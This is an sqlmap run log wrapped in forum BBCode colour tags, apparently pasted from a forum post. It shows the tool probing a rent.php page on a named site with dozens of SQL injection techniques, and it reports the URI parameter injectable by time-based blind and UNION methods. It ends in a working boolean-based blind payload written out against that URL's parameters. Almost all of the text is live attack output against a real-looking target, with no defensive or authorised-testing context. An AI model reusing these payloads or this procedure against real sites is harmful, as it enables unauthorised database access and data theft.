[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird OR error-based - WHERE or HAVING clause'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]14[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]15[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]17[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]18[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]19[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird error-based - Parameter replace'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]20[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Microsoft SQL Server/Sybase inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SQLite inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries (comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries (query SLEEP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL 8.1 stacked queries (comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL > 8.1 stacked queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL 2.0 stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SQLite > 2.0 stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]36[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]36[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SAP MaxDB stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SAP MaxDB stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 2.0 stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]appears to be[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[/COLOR][COLOR="#0000BB"]injectable
it looks like the back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS is[/COLOR][COLOR="#DD0000"]'MySQL'[/COLOR][COLOR="#007700"]. Do[/COLOR][COLOR="#0000BB"]you want to skip test payloads specific[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]other DBMSes[/COLOR][COLOR="#007700"]? [[/COLOR][COLOR="#0000BB"]Y[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]y
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]44[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 1 to 20 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]44[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]automatically extending ranges[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]UNION query injection technique tests[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]there is at least one other[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]potential[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]techni
que found
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]45[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]'ORDER BY'[/COLOR][COLOR="#0000BB"]technique appears to be usable[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]This should reduce the time needed to find the right number of query columns[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]A
utomatically extending the range[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]current UNION query injection technique test
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]47[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]target URL appears to have 1 column in query
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]] if[/COLOR][COLOR="#0000BB"]UNION based SQL injection is not detected[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]please consider[/COLOR][COLOR="#007700"]and/or try[/COLOR][COLOR="#0000BB"]to force the back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]g[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'--dbms=mysql
'[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]target URL appears to be UNION injectable with 1 columns
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 1 to 20 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 21 to 40 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 21 to 40 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]34[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 41 to 60 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]44[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 41 to 60 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]54[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 61 to 80 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]04[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 61 to 80 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 81 to 100 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 81 to 100 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]checking[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]the injection point on URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]is a false positive
URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]is vulnerable[/COLOR][COLOR="#007700"]. Do[/COLOR][COLOR="#0000BB"]you want to keep testing the others[/COLOR][COLOR="#007700"](if[/COLOR][COLOR="#0000BB"]any[/COLOR][COLOR="#007700"])? [[/COLOR][COLOR="#0000BB"]y[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]N[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]n
sqlmap identified the following injection point[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]with a total of 364 HTTP[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]requests[/COLOR][COLOR="#007700"]:
---
[/COLOR][COLOR="#0000BB"]Parameter[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]#1* (URI)
[/COLOR][COLOR="#0000BB"]Type[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]boolean[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind
Title[/COLOR][COLOR="#007700"]: AND[/COLOR][COLOR="#0000BB"]boolean[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]WHERE[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]HAVING clause
Payload[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
